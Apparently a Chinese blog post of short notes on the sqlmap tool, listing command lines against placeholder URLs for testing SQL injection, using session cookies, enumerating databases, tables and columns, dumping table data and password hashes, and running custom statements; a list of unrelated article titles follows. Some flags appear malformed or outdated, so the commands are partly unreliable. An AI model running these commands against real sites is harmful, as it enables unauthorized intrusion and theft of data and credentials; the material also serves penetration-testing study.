sqlmap笔记
sqlmap -u "注入链接" --其他参数或命令 (-v 1表示回显出注入过程)
【判断指定字段是否存在注入点】
当链接包含两个参数时,可用-p开关选择要注入的参数,例检测id是否存在注入点:
sqlmap -u "http://www.xxx.com/test.asp?id=1&name=a" -v 1 -p "id"
【带Cookie注入】
登陆后抓取Cookie,
sqlmap -u "http://xxx.com/test?id=1" -v 1 --cookie "此处为cookie信息"
【查询包含哪些数据库】
sqlmap -u "http://xxx.com/test?id=1" -v 1 --dbs
【查询有哪些表】
sqlmap -u "http://xxx.com/test?id=1" --tables -D "数据库名"
【查询表中字段】
sqlmap -u "http://xxx.com/test?id=1" --columns -T "表名" -D "数据库名"
【查询字段数据】
sqlmap -u "http://xxx.com/test?id=1" --dump -columns "字段名" -T "表名" -D "数据库名"
【列出表中所有数据】
sqlmap -u "http://xxx.com/test?id=1" --dump -T "表名" -D "数据库名"
【列出当前数据库的用户名和密码Hash】
sqlmap -u "http://xxx.com/test?id=1" --passwords
【判断是否能union注入和构造出语句雏形】
sqlmap -u "http://xxx.com/test?id=1" --union-check
【用union查询方法获得数据】
sqlmap -u "http://xxx.com/test?id=1" --union--use -dbs
【保存注入进度以便下次继续进行】注入中按ctrl+c中断 目录下将生成log文件
sqlmap -u "http://xxx.com/test?id=1" -v 1 -o "XXX.log"
【恢复注入进度】
sqlmap -u "http://xxx.com/test?id=1" -v 1 -o "XXX.log" --resume
【自定义语句】
sqlmap -u "http://xxx.com/test?id=1" -v 1 -e "要执行的语句"
参考文章:http://drops.wooyun.org/tips/143
最新文章
- eventbus 备注
- 窥探Swift系列博客说明及其Swift版本间更新
- W-数据库基础
- Ubuntu上安装Apache、MySql和PHP
- Android Studio-AndroidStudio目录结构
- SqlSever基础 delete 删除一个表中的所有数据
- Java多线程之新类库中的构件DelayQueue
- Java:IO流之转换流
- oracle数据库建表
- Wikioi 1294 全排列
- Blast使用详解
- 8.21.2 深入finally语句快
- js-使用JavaScript、jQuery两种方式实现全选/全不选
- memcached /usr/local/memcached/bin/memcached: error while loading shared libraries: libevent-2.0.so.5: cannot open shared object file: No such file or directory
- Excelpackage的简单使用(导出用户信息并保存)
- SummerNote 富文本编辑器 - Rails 集成
- Web API2 使用EF Code Migrations to Seed DB
- python练习题-day14
- ElasticSearch权威指南学习(映射和分析)
- 【Mac使用系列】Mac锁屏及快捷键